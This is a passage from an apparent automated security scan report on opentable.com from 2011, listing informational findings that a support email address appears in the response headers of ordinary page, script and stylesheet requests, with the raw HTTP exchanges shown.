Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /jscripts/topten.js

Issue detail

The following email address was disclosed in the response:

Request

GET /jscripts/topten.js?v=Web_11_10_0_11.prod.com HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/jaspers-corner-tap-and-kitchen?rid=200&restref=200
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; restrefwhite=200; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=200; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; jslt=DhNUH7QEwV3Jv9lH5b7HaYn50h4yr3sP; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 21911
Content-Type: application/x-javascript
Last-Modified: Fri, 23 Sep 2011 02:14:24 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-02
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:22-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:55:09 GMT

var m_cMostBooked1000ListTypeID="2";var m_cListItemID_Prefix="dvCat_";var m_cListItemRestaurantsID_Prefix="DIV_";var m_cRegionSlotSCVar="regionslot";var m_cDCListSlotSCVar="DClist";var m_currentObj=nu
...[SNIP]...
20.233. http://www.opentable.com/opentables.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /opentables.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /opentables.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.opentable.com/interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a44&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; pgseq=; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:54:50 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a54%3a50&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=HOc063kcXtuTOSWwv4Mb2w%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=HOc063kcXtuTOSWwv4Mb2w%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=HOc063kcXtuTOSWwv4Mb2w%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=1&vbefreg=1&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:50 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=HOc063kcXtuTOSWwv4Mb2w%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=1&vbefreg=1&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=1&vbefreg=1&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=HOc063kcXtuTOSWwv4Mb2w%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=HOc063kcXtuTOSWwv4Mb2w%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=HOc063kcXtuTOSWwv4Mb2w%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Vary: Accept-Encoding
Content-Length: 46252


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...[SNIP]...
20.234. http://www.opentable.com/rest_profile.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /rest_profile.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /rest_profile.aspx?rid=200&restref=200 HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.kimptonhotels.com/restaurants/restaurant-reservations.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a44&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; pgseq=; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 301 Moved Permanently
Date: Mon, 03 Oct 2011 12:54:50 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
Etag:
X-OpenTableHost: SC-NA-WEB-02
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:22-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Location: http://www.opentable.com/jaspers-corner-tap-and-kitchen?rid=200&restref=200
Content-Length: 285
Content-type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1><p>The document has moved <a href="http://www.opentable
...[SNIP]...
20.235. http://www.opentable.com/restaurant-search.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /restaurant-search.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /restaurant-search.aspx?startDate=10%2F03%2F2011&ResTime=7%3A00+PM&PartySize=2&PartySizeFake=2+People&RestaurantID=90&rid=90&GeoID=4&txtDateFormat=MM%2Fdd%2Fyyyy&RestaurantReferralID=90 HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pgseq=; ftc=x=10%2f03%2f2011+15%3a53%3a35&p1=220&p1q=rid%3d90%26restref%3d90%26bgcolor%3de3d4a4%26titlecolor%3d000000%26subtitlecolor%3d000000%26btnbgimage%3dhttp%253a%252f%252fwww.opentable.com%252ffrontdoor%252fimg%252fot_btn_black.png%26otlink%3dFFFFFF%26icon%3ddark%26mode%3dshort&c=0; lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]

Response

HTTP/1.1 302 Found
Date: Mon, 03 Oct 2011 12:54:44 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
Etag:
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Location: http://www.opentable.com/interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011 7:00 PM&rtype=ism_mod
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a54%3a44&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=0; domain=.opentable.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 247

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.opentable.com/interim.aspx?rid=90&amp;restref=90&amp;m=4&amp;t=single&amp;p=2&amp;d=10/3/2011 7:00 PM&amp;
...[SNIP]...
20.236. http://www.opentable.com/styles/Modules/Search.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /styles/Modules/Search.css

Issue detail

The following email address was disclosed in the response:

Request

GET /styles/Modules/Search.css?v=Web_11_10_0_11.prod.com HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.opentable.com/opentables.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 18236
Content-Type: text/css
Last-Modified: Fri, 23 Sep 2011 02:15:24 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-02
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:22-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:50 GMT

...#ProcessingMessage{border:1px solid red;background-color:#fff;position:absolute;z-index:100;top:200px;margin-left:20px;width:400px;display:none;}.Arrow{width:9px;height:9px;}.HeaderRow .Arrow{margi
...[SNIP]...
20.237. http://www.opentable.com/styles/Modules/popup.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /styles/Modules/popup.css

Issue detail

The following email address was disclosed in the response:

Request

GET /styles/Modules/popup.css?v=Web_11_10_0_11.prod.com HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.opentable.com/opentables.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 17479
Content-Type: text/css
Last-Modified: Fri, 23 Sep 2011 02:15:24 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:51 GMT

... .universal_popup,.wrapper,#locationPopup{margin:.5em 0;position:absolute;z-index:555;}.boxTop{background:url(../../img/borders/modules/ot_box_noshadow.gif) no-repeat 100% 0;margin:0 0 0 18px;heigh
...[SNIP]...
20.238. http://www.opentable.com/styles/Normal/OTCalStylesNormal.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /styles/Normal/OTCalStylesNormal.css

Issue detail

The following email address was disclosed in the response:

Request

GET /styles/Normal/OTCalStylesNormal.css?v=Web_11_10_0_11.prod.com HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.opentable.com/opentables.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 5884
Content-Type: text/css
Last-Modified: Fri, 23 Sep 2011 02:15:22 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-05
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:50 GMT

... #popupBody{margin:0;padding:0;background-color:#EFEDD8;}#popupBody form{padding:0;margin:0;}#Popup{font-family:Verdana,Arial,sans-serif;text-align:center;background:#FFFCE6;margin:0;padding:0;}#cl
...[SNIP]...
20.239. http://www.opentable.com/styles/Normal/ot_style003.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /styles/Normal/ot_style003.css

Issue detail

The following email address was disclosed in the response:

Request

GET /styles/Normal/ot_style003.css?ver=Web_11_10_0_11.prod.com HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 121886
Content-Type: text/css
Last-Modified: Fri, 23 Sep 2011 02:15:24 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:57:46 GMT

h5{float:left;font-size:65%;text-align:left;margin:0 0 10px 0;padding:6px 0 4px 10px;font-weight:normal;color:White;width:747px;display:block;}* html h5{width:980px;}* html #BRTag{display:none;}.Detai
...[SNIP]...
20.240. http://www.opentable.com/styles/Normal/topandbot.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /styles/Normal/topandbot.css

Issue detail

The following email address was disclosed in the response:

Request

GET /styles/Normal/topandbot.css?v=Web_11_10_0_11.prod.com HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 13256
Content-Type: text/css
Last-Modified: Fri, 23 Sep 2011 02:15:24 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:57:39 GMT

... body{background-color:#867F75;font-family:Verdana,Arial,sans-serif;text-align:center;background-position:center;}.divider{display:none;}a.error:link,a.error:hover,a.error:visited,a.error:active{co
...[SNIP]...
20.241. http://www.opentable.com/styles/Pages/Start.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /styles/Pages/Start.css

Issue detail

The following email address was disclosed in the response:

Request

GET /styles/Pages/Start.css?v=Web_11_10_0_11.prod.com HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 56747
Content-Type: text/css
Last-Modified: Fri, 23 Sep 2011 02:15:22 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-04
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:21 GMT

body{margin-top:1px!important;}.DisplayNone{display:none;}#TopNav{margin-top:4px!important;}#ContentArea{background-color:#fefcf7;clear:both;display:block;float:left;padding:0;width:980px;color:#42382
...[SNIP]...
20.242. http://www.opentable.com/styles/PromoNationalRoundup.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /styles/PromoNationalRoundup.css

Issue detail

The following email address was disclosed in the response:

Request

GET /styles/PromoNationalRoundup.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
